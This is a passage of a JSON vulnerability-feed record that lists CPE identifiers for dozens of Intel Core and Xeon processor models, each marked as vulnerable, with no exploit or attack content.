"cpe23Uri": "cpe:2.3:h:intel:core_i5:6440eq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6440hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6267u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6287u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6102e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6157u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m3:7y32:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m3:7y30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5750hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5700eq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5550u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5500u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5287u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5257u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y71:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y70:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4910mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4950hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4870hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700ec:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4710mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4712hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5575r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5350u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:5157u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:5020u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:5015u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4800mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4810mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702ec:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4722hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4750hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4600m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4600u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4558u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4578u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4590t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4460:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4300y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4302y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4220y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4330te:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4340:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4370t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4120u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4158u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4130:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4000m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4030u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4030y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2648l:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2670:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2680:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8837:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8830:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2860:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2850:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8890_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4809_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8893_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880l_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8890_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_bronze_3104:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4116t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4108:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6154:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6142m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6142f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6142:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6134m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6134:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6126f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6126:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8176m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8176f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7250f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7250:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:8550u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:8650u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:8100:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:8350k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6685r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6400:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6400t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6300u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6200u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:6260u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6006u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:6098p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5950hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5850hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5850eq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5600u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5557u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5350h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:5300u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:5010u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:5005u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4900mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4850hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4860hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4710hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4760hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770te:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4610m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4610y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4422e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4410e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4440s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4440:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4308u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4310m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4310u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4250u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4258u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4340te:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4350:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4170t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4170:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4005u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4010u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4771:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4785t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4650u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4500u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4402ec:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4402e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4430s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4430:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4330m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4340m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4202y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4260u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:4278u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4350t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4360:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4102e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4110e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4160t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4160:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4010y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:4012y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4627_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697a_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2695_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658_v4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2628l_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2623_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650_v4:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2428l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4667_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4627_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658a_v3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2608l_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603_v3:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4607_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2428l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450l_v2:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667_v2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { 